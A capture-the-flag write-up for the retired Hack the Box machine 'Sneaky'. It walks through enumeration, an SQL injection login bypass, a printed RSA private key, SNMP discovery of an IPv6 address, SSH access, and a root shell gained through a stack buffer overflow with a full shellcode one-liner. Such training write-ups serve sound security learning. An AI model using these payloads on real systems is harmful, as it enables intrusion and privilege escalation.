Today we are going to solve another CTF challenge “Sneaky” which is available online for those who want to increase their skill in penetration testing and black box testing. Sneaky is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
let’s begin with nmap port enumeration.
root@kali:~/htb/sneaky# nmap -sT -sU -p 161,80 10.10.10.20 Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-24 10:56 CET Stats: 0:00:15 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan Parallel DNS resolution of 1 host. Timing: About 0.00% done Nmap scan report for 10.10.10.20 Host is up (0.026s latency). PORT STATE SERVICE 80/tcp open http 161/tcp closed snmp 80/udp closed http 161/udp open snmp Nmap done: 1 IP address (1 host up) scanned in 16.83 seconds
As port 80 is running http we open it in our browser, the website shows that it’s under construction.
We initiate dirb to enumerate the directories hosted on the target machine.
root@kali:~/htb/sneaky# dirb http://10.10.10.20/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Dec 24 11:37:09 2018 URL_BASE: http://10.10.10.20/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.20/ ---- ==> DIRECTORY: http://10.10.10.20/dev/
We find a directory called /dev/ we open it in our browser and find a login screen.
We find the login page is vulnerable to sql injection; we use this vulnerability to bypass the login page using query ‘ or 1=1;– in username and password.
After logging in we find a link on the webpage.
We open the link and find a RSA private key. We download the key into our system.
http://10.10.10.20/dev/sshkeyforadministratordifficulttimes
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAvQxBD5yRBGemrZI9F0O13j15wy9Ou8Z5Um2bC0lMdV9ckyU5 Lc4V+rY81lS4cWUx/EsnPrUyECJTtVXG1vayffJISugpon49LLqABZbyQzc4GgBr 3mi0MyfiGRh/Xr4L0+SwYdylkuX72E7rLkkigSt4s/zXp5dJmL2RBZDJf1Qh6Ugb yDxG2ER49/wbdet8BKZ9EG7krGHgta4mfqrBbZiSBG1ST61VFC+G6v6GJQjC02cn cb+zfPcTvcP0t63kdEreQbdASYK6/e7Iih/5eBy3i8YoNJd6Wr8/qVtmB+FuxcFj oOqS9z0+G2keBfFlQzHttLr3mh70tgSA0fMKMwIDAQABAoIBAA23XOUYFAGAz7wa Nyp/9CsaxMHfpdPD87uCTlSETfLaJ2pZsgtbv4aAQGvAm91GXVkTztYi6W34P6CR h6rDHXI76PjeXV73z9J1+aHuMMelswFX9Huflyt7AlGV0G/8U/lcx1tiWfUNkLdC CphCICnFEK3mc3Mqa+GUJ3iC58vAHAVUPIX/cUcblPDdOmxvazpnP4PW1rEpW8cT OtsoA6quuPRn9O4vxDlaCdMYXfycNg6Uso0stD55tVTHcOz5MXIHh2rRKpl4817a I0wXr9nY7hr+ZzrN0xy5beZRqEIdaDnQG6qBJFeAOi2d7RSnSU6qH08wOPQnsmcB JkQxeUkCgYEA3RBR/0MJErfUb0+vJgBCwhfjd0x094mfmovecplIUoiP9Aqh77iz 5Kn4ABSCsfmiYf6kN8hhOzPAieARf5wbYhdjC0cxph7nI8P3Y6P9SrY3iFzQcpHY ChzLrzkvV4wO+THz+QVLgmX3Yp1lmBYOSFwIirt/MmoSaASbqpwhPSUCgYEA2uym +jZ9l84gdmLk7Z4LznJcvA54GBk6ESnPmUd8BArcYbla5jdSCNL4vfX3+ZaUsmgu 7Z9lLVVv1SjCdpfFM79SqyxzwmclXuwknC2iHtHKDW5aiUMTG3io23K58VDS0VwC GR4wYcZF0iH/t4tn02qqOPaRGJAB3BD/B8bRxncCgYBI7hpvITl8EGOoOVyqJ8ne aK0lbXblN2UNQnmnywP+HomHVH6qLIBEvwJPXHTlrFqzA6Q/tv7E3kT195MuS10J VnfZf6pUiLtupDcYi0CEBmt5tE0cjxr78xYLf80rj8xcz+sSS3nm0ib0RMMAkr4x hxNWWZcUFcRuxp5ogcvBdQKBgQDB/AYtGhGJbO1Y2WJOpseBY9aGEDAb8maAhNLd 1/iswE7tDMfdzFEVXpNoB0Z2UxZpS2WhyqZlWBoi/93oJa1on/QJlvbv4GO9y3LZ LJpFwtDNu+XfUJ7irbS51tuqV1qmhmeZiCWIzZ5ahyPGqHEUZaR1mw2QfTIYpLrG UkbZGwKBgGMjAQBfLX0tpRCPyDNaLebFEmw4yIhB78ElGv6U1oY5qRE04kjHm1k/ Hu+up36u92YlaT7Yk+fsk/k+IvCPum99pF3QR5SGIkZGIxczy7luxyxqDy3UfG31 rOgybvKIVYntsE6raXfnYsEcvfbaE0BsREpcOGYpsE+i7xCRqdLb -----END RSA PRIVATE KEY-----
Now the target machine is not running any ssh service so that we can use this to login through ssh.
To investigate further we enumerate SNMP protocol to gain more information.
root@kali:~/htb/sneaky# snmpwalk -v2c -c public 10.10.10.20 iso.3.6.1.2.1.1.1.0 = STRING: "Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686" iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10 iso.3.6.1.2.1.1.3.0 = Timeticks: (3570073) 9:55:00.73 iso.3.6.1.2.1.1.4.0 = STRING: "root" iso.3.6.1.2.1.1.5.0 = STRING: "Sneaky" iso.3.6.1.2.1.1.6.0 = STRING: "Unknown" iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
root@kali:~/htb/sneaky# python enyx.py 2c public 10.10.10.20 ####################################################################### [+] Snmpwalk found. [+] Grabbing IPv6. [+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001 [+] Unique-Local -> dead:beef:0000:0000:0250:56ff:fe8f:6bf0 [+] Link Local -> fe80:0000:0000:0000:0250:56ff:fe8f:6bf0
or
root@kali:~/htb/sneaky# apt install snmp-mibs-downloader root@kali:~/htb/sneaky# vi /etc/snmp/snmp.conf # As the snmp packages come without MIB files due to license reasons, loading # of MIBs is disabled by default. If you added the MIBs you can reenable # loading them by commenting out the following line. # mibs : root@kali:~/htb/sneaky# snmpwalk -v2c -c public 10.10.10.20 > snmpwalk.txt root@kali:~/htb/sneaky# cat snmpwalk.txt | grep ipv6 IP-MIB::ipAddressPrefix.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:8f:6b:f0" = OID: IP-MIB::ipAddressPrefixOrigin.2.ipv6."de:ad:be:ef:00:00:00:00:00:00:00:00:00:00:00:00".64
After finding the ipv6 address of the target machine we login through ssh using the username and RSA Private key that we find after we login on the /dev/ page.
root@kali:~/htb/sneaky# ssh -i priv -6 thrasivoulos@dead:beef:0000:0000:0250:56ff:fe8f:6bf0 The authenticity of host 'dead:beef::250:56ff:fe8f:6bf0 (dead:beef::250:56ff:fe8f:6bf0)' can't be established. ECDSA key fingerprint is SHA256:KCwXgk+ryPhJU+UhxyHAO16VCRFrty3aLPWPSkq/E2o. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'dead:beef::250:56ff:fe8f:6bf0' (ECDSA) to the list of known hosts. lsWelcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686) * Documentation: https://help.ubuntu.com/ System information as of Mon Dec 24 04:46:18 EET 2018 System load: 0.0 Memory usage: 4% Processes: 177 Usage of /: 9.9% of 18.58GB Swap usage: 0% Users logged in: 0 Graph this data and manage this system at: https://landscape.canonical.com/ Your Hardware Enablement Stack (HWE) is supported until April 2019. Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077 lsthrasivoulos@Sneaky:~$ ls
After logging in through ssh we find a file called user.txt we open it and find our first flag. Now we try to find files with suid bit set.
thrasivoulos@Sneaky:~$ find / -perm -4000 2>/dev/null /bin/umount /bin/su /bin/mount /bin/ping6 /bin/fusermount /bin/ping /usr/local/bin/chal /usr/sbin/uuidd /usr/sbin/pppd /usr/bin/at /usr/bin/pkexec /usr/bin/traceroute6.iputils /usr/bin/chsh /usr/bin/gpasswd /usr/bin/passwd /usr/bin/mtr /usr/bin/newgrp /usr/bin/sudo /usr/bin/chfn /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device thrasivoulos@Sneaky:~$
thrasivoulos@Sneaky:~$ base64 /usr/local/bin/chal > /tmp/chall.b64 root@kali:~/htb/sneaky# base64 -d chall.b64 ELF 4T4 --snip-- art____dso_handle_IO_stdin_used__libc_start_main@@GLIBC_2.0__libc_csu_init_end_start_fp_hw__bss_startmain_Jv_RegisterClasses__TMC_ENroot@kali:~/htb/sneaky# root@kali:~/htb/sneaky# ./checksec.sh --file chall RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO No canary found NX disabled No PIE No RPATH No RUN
Nothing seem[s] to be enabled, So means this is going to be straight forward vanilla based Linux Buffer Overflow. Now let[s] start our fuzzing.
root@kali:~/htb/sneaky# ./chall AAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAaaaaaaaaaaaaaaaaaa Segmentation fault
So we got segmental fault, now run this binary in gdb and run it with the pattern.
Let[s] create our pattern using https://github.com/ickerwx/pattern
root@kali:~/htb/sneaky# python pattern_create.py 1000 ------------------------------------------------------------------------- Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B ------------------------------------------------------------------------- Length: 1000 [+] SetA: 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' [+] SetB: 'abcdefghijklmnopqrstuvwxyz' [+] SetC: '0123456789' ------------------------------------------------------------------------- root@kali:~/htb/sneaky#
Now run it in GDB,
root@kali:~/htb/sneaky# gdb chall GNU gdb (Debian 8.1-4+b1) 8.1 Copyright (C) 2018 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". ---Type <return> to continue, or q <return> to quit--- Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from chall...(no debugging symbols found)...done. (gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B Starting program: /root/htb/sneaky/chall Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac--snip-- g9Bh0Bh1Bh2B Program received signal SIGSEGV, Segmentation fault. ---Type <return> to continue, or q <return> to quit--- 0x316d4130 in ?? () (gdb)
So, we got segmental fault and we got address : 0x316d4130 , Now let’s check it where this character address occur[s]
root@kali:~/htb/sneaky# python pattern.py offset 0x316d4130 362
So, we got offset at 362 , means the next 4 bytes are going to be our EIP. Now we need a shellcode: http://shell-storm.org/shellcode/files/shellcode-827.php
- After enumerating the executable file, we understand it is an elf executable file 32 bit and it uses strcpy().
- Function strcpy() is vulnerable to Buffer Overflow
- After running gdb and understanding memory allocations, following code will successfully run shell with root user.
- The shell code used is
thrasivoulos@Sneaky:/usr/local/bin$ ./chal $(python -c 'print "\x90"*330 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x42\xf4\xff\xbf"*30') # id uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos) # whoami root # cd / # cd root # cat root.txt c515*****b33
Author: Jacco Straathof